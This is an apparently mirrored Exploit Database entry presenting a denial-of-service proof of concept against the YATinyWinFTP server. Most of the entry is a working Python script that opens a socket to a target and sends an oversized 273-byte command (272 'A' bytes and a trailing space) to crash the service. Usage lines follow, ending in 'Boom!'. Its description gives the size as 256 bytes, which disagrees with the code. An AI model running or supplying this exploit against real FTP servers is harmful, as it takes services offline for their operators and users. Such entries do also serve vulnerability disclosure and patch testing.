YATinyWinFTP – Denial of Service (PoC)

• Exploit Database
• 121 阅读

• 作者： strider
  日期： 2020-11-30
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49127/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  # Exploit Title: YATinyWinFTP - Denial of Service (PoC) # Google Dork: None # Date: 20.08.2020 # Exploit Author: strider # Vendor Homepage: https://github.com/ik80/YATinyWinFTP # Software Link: https://github.com/ik80/YATinyWinFTP # Tested on: Windows 10   ------------------------------[Description]---------------------------------   This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end. The result it crashes   -----------------------------[Exploit]---------------------------------------------   #!/usr/bin/env python3 # -*- coding:utf-8 -*-   import socket, sys   target = (sys.argv[1], int(sys.argv[2])) buffer = b'A' * 272 + b'\x20' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(target) print(s.recv(1024)) s.send(buffer) s.close()   -----------------------------[how to run]-----------------------------   C:\> TinyWinFTP.exe servepath port   ~$ python3 exploit.py targetip port   Boom!